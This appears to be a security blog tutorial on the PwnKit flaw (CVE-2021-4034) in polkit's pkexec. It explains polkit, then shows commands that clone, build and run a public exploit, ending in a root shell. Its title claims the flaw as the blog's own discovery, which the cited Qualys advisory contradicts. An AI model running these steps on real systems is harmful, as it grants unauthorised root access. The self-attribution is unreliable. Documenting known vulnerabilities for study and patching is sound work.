WaheSec

Exploitation of Linux Privilege Escalation Vulnerability CVE-2021-4034. (This vulnerability is one of our most beautiful discoveries)

Greetings everyone! In this write-up, I will explain and show the exploitation of a well known vulnerability (Privilege Escalation) in Linux operation system which targeted polkit’s pkexec program.  What is Polkit? A polkit is a type of authorization framework known as “PolicyKit”. It is used to perform authorization process between Linux processes. Let’s take an example where…

Harshraj Singh Bedi
, , , ,

Greetings everyone! In this write-up, I will explain and show the exploitation of a well known vulnerability (Privilege Escalation) in Linux operation system which targeted polkit’s pkexec program. 

What is Polkit?

A polkit is a type of authorization framework known as “PolicyKit”. It is used to perform authorization process between Linux processes. Let’s take an example where there are two processes, “Process1” with higher privileges and “Process2” with low privileges. The scenario is that the Process1 receives a request from Process2 to perform certain action. The Process1 needs to decide whether the request is coming from admin/system owner of other user. Instead of deciding itself, the Process1 asks the PolicyKit to verify the authorization. In this way the PolicyKit acts as a trusted authority and sometimes give temporary permissions to users by performing some authentication mechanisms.

What is pkexec?

pkexec is basically a command-line tool which allows user to execute a program as another user or with elevated privileges such as root. The pkexec executes commands as root user generally unless specified otherwise.

Example – User executes a command using pkexec. The pkexec will check whether the user is authorized to execute the command using authorization rules defined in the polkit.

Where the Vulnerability Raised?

The vulnerability was raised due to improper handling of arguments passed to the pkexec binary. The attacker can exploit this vulnerability by crafting malicious input to manipulate the pkexec into executing arbitrary code.

Download the Exploit

Exploitation

>> git clone https://github.com/berdav/CVE-2021-4034?tab=MIT-1-ov-file
>> cd CVE-2021-4034-main/
>> ls
cve-2021-4034.c   dry-run  Makefile  README.md
cve-2021-4034.sh  LICENSE  pwnkit.c
>> make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
>> ls
cve-2021-4034      dry-run         LICENSE    pwnkit.so
cve-2021-4034.c    gconv-modules   Makefile   README.md
cve-2021-4034.sh  'GCONV_PATH=.'   pwnkit.c
>> ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root)

References

https://manpages.ubuntu.com/manpages/focal/en/man8/polkit.8.html

https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

https://access.redhat.com/security/vulnerabilities/RHSB-2022-001

Leave a Reply

Your email address will not be published. Required fields are marked *

Trending